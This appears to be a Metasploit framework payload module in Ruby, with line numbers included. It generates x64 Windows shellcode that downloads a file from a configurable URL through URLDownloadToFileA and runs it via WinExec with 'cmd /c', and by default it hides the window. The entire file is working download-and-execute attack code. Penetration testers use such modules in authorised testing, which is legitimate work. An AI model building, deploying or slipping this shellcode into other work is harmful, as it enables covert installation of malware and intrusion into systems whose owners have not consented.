1
# frozen_string_literal: true
2

3
##
4
# This module requires Metasploit: https://metasploit.com/download
5
# Current source: https://github.com/rapid7/metasploit-framework
6
##
7

8
module MetasploitModule
9
  CachedSize = 353
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Windows
13
  include Msf::Payload::Windows::BlockApi_x64
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'Windows Download Execute',
20
        'Description' => 'Downloads and executes the file from the specified url.',
21
        'Author' => 'Muzaffer Umut ŞAHİN <[email protected]>',
22
        'License' => MSF_LICENSE,
23
        'Platform' => 'win',
24
        'Arch' => ARCH_X64
25
      )
26
    )
27

28
    display_options = %w[HIDE SHOW]
29

30
    register_options(
31
      [
32
        OptString.new('URL', [true, 'The url to download the file from.', 'http://localhost/hi.exe']),
33
        OptString.new('FILEPATH', [true, 'The path to save the downloaded file.', 'fox.exe']),
34
        OptEnum.new('DISPLAY', [true, 'The Display type.', display_options[0], display_options])
35
      ]
36
    )
37
  end
38

39
  def generate(_opts = {})
40
    url = datastore['URL'] || 'http://localhost/hi.exe'
41
    file = datastore['FILEPATH'] || 'fox.exe'
42
    display = datastore['DISPLAY'] || 'HIDE'
43

44
    payload = %^
45
            cld
46
            and rsp, -16
47
            call main
48
            #{asm_block_api}
49

50
        main:
51
            pop rbp
52
            call LoadLibrary
53
            db "urlmon.dllK"
54

55
        LoadLibrary:
56
            pop rcx ; rcx points to the dll name.
57
            xor byte [rcx+10], 'K' ; null terminator
58
            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
59
            call rbp ; LoadLibraryA("urlmon.dll")
60
            ; To live alone one must be an animal or a god, says Aristotle. There is yet a third case: one must be both--a philosopher.
61

62
        SetUrl:
63
            call SetFile
64
            db "#{url}A"
65

66
        SetFile:
67
            pop rdx ; 2nd argument
68
            xor byte [rdx+#{url.length}], 'A' ; null terminator
69
            call UrlDownloadToFile
70
            db "#{file}C"
71

72
        UrlDownloadToFile:
73
            pop r8 ; 3rd argument
74
            xor byte [r8+#{file.length}], 'C' ; null terminator
75
            xor rcx,rcx ; 1st argument
76
            xor r9,r9   ; 4th argument
77
            sub rsp, 8
78
            push rcx    ; 5th argument
79
            mov r10d, #{Rex::Text.block_api_hash('urlmon.dll', 'URLDownloadToFileA')}
80
            call rbp
81

82
        SetCommand:
83
            call Exec
84
            db "cmd /c #{file}F"
85

86
        Exec:
87
            pop rcx ; 1st argument
88
            xor byte [rcx+#{file.length + 7}], 'F' ; null terminator
89
            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')}
90
            xor rdx, rdx ; 2nd argument
91
        ^
92

93
    if display == 'HIDE'
94
      hide = %(
95
            call rbp
96
            )
97
      payload << hide
98

99
    elsif display == 'SHOW'
100
      show = %(
101
            inc rdx ; SW_NORMAL = 1
102
            call rbp
103
            )
104
      payload << show
105
    end
106

107
    if datastore['EXITFUNC'] == 'process'
108
      exit_asm = %(
109
            xor rcx,rcx
110
            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
111
            call rbp
112
            )
113
      payload << exit_asm
114

115
    elsif datastore['EXITFUNC'] == 'thread'
116
      exit_asm = %(
117
            xor rcx,rcx
118
            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
119
            call rbp
120
            )
121
      payload << exit_asm
122
    end
123

124
    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
125
  end
126
end
127

128